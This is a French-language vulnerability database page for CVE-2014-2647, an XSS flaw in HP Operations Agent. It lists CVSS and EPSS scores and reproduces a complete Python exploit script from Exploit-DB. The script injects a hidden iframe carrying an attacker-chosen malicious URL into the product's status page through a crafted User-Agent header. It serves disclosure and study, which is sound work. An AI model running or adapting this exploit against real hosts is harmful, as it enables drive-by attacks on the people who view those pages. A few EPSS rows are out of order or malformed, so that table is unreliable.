CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
Cross-site scripting (XSS) vulnerability in HP Operations Agent in HP Operations Manager (formerly OpenView Communications Broker) before 11.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
4.3
AV:N/AC:M/Au:N/C:N/I:P/A:N
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
2.17%
–
–
2022-03-13
–
–
1.95%
–
–
2022-04-03
–
–
1.95%
–
–
2022-05-29
–
–
1.95%
–
–
2022-10-23
–
–
1.95%
–
–
2023-01-01
–
–
1.95%
–
–
2023-01-15
–
–
1.95%
–
–
2023-03-12
–
–
–
0.21%
–
2023-07-02
–
–
–
0.21%
–
2023-11-05
–
–
–
0.21%
–
2023-11-12
–
–
–
0.21%
–
2023-11-19
–
–
–
0.21%
–
2023-12-03
–
–
–
0.21%
–
2023-12-17
–
–
–
0.21%
–
2024-02-11
–
–
–
0.21%
–
2024-06-02
–
–
–
0.21%
–
2024-06-02
–
–
–
0.21%
–
2024-10-20
–
–
–
0.2%
–
2024-12-15
–
–
–
0.2%
–
2024-12-22
–
–
–
0.3%
–
2025-01-26
–
–
–
0.21%
–
2025-01-19
–
–
–
0.3%
–
2025-01-25
–
–
–
0.21%
–
2025-03-18
–
–
–
–
5.4%
2025-03-30
–
–
–
–
5.14%
2025-04-06
–
–
–
–
2.05%
2025-04-15
–
–
–
–
2.05%
2025-04-15
–
–
–
–
2.05,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2014-10-26 23h00 +00:00 Auteur : Matt Schmidt EDB Vérifié : Yes
#!/usr/bin/python
# Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection
# Date: 10/16/2014
# Exploit Author: Matt Schmidt (Syph0n)
# Vendor Homepage: www.hp.com
# Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14
# Tested on: Windows 7, SunOS, RHEL Linux
# CVE : CVE-2014-2647
#
# This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker/ HP Operations Agent.
# This vulnerability is stored in nature until the connection is terminated as it adds the XSS string to the User Agent.
# Vulnerable page: /Hewlett-Packard/OpenView/BBC/status
# This Exploit injects a Hidden iFrame which can be used for Social Engineering attacks as a browser exploit or other malicious URL can be embedded.
#
# Vulnerability Discovered by: Matt Schmidt (Syph0n)
# Timeline:
# 07/07/2014 - Submitted Discovery to ZDI
# 07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT.
# 07/12/2014 - Contacted HP SSRT
# 07/13/2014 - HP SSRT assigned Case SSRT101643
# 07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT
# 07/30/2014 - Followed up with HP
# 07/31/2014 - Response from HP Indicating they need more time for Engineering to look into the submission
# 08/13/2014 - Followed up with HP
# 08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14
# 08/24/2014 - Followed up with HP on CVE Identified and Disclosure Date
# 08/31/2014 - Followed up with HP again as no response to previous email
# 09/04/2014 - Followed up with HP again as no response to previous two emails
# 09/14/2014 - Followed up with HP again as no response to previous three emails
# 09/16/2014 - HP Responded stating they where "sorting out various items concerning this issue"
# 10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier
# 10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th.
# 10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444
# 10/15/2014 - CVE-2014-2647 Issued for this vulnerability
import argparse, socket, sys
# Define Help Menu
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
print '\nUsage: ./exploit.py <TargetIP> <iFrame URL> [Port]\n'
print ' <TargetIP>: The Target IP Address'
print ' <iFrame URL>: Malicious URL that will be injected as a hidden iframe\n'
print 'Options:'
print ' [--port]: The port the HP Communications Broker is running on, default is 383'
sys.exit(1)
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument("TargetIP")
parser.add_argument("iFrameURL")
parser.add_argument("--port", type=int, default=383)
args = parser.parse_args()
# Define User Agent to be spoofed
agent = 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'
# Define Variables
host = args.TargetIP
port = args.port
iFrameURL = args.iFrameURL
def main():
# Malicious hidden iframe payload that takes input from args.iFrameURL and fake UserAgent from agent_list
payload = "GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\nUser-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' src='"+iFrameURL+"'></iframe><a>"+ agent +"</a>\r\n\r\n"
# Create Socket and check connection to target.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Checking host: " +host+"\n"
try:
s.connect((host, int(port)))
except Exception as e:
print "[+] Error Connecting: ", e
exit()
print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n"
# Keep connection alive
while payload != 'q':
s.send(payload.encode())
data = s.recv(1024)
print "[*] Payload Sent."
payload = raw_input("\n[+] Keeping Connection Open ([q]uit):")
return
if __name__ == '__main__':
main()
Products Mentioned
Configuraton 0
Hp>>Operations_agent >> Version To (including) 11.13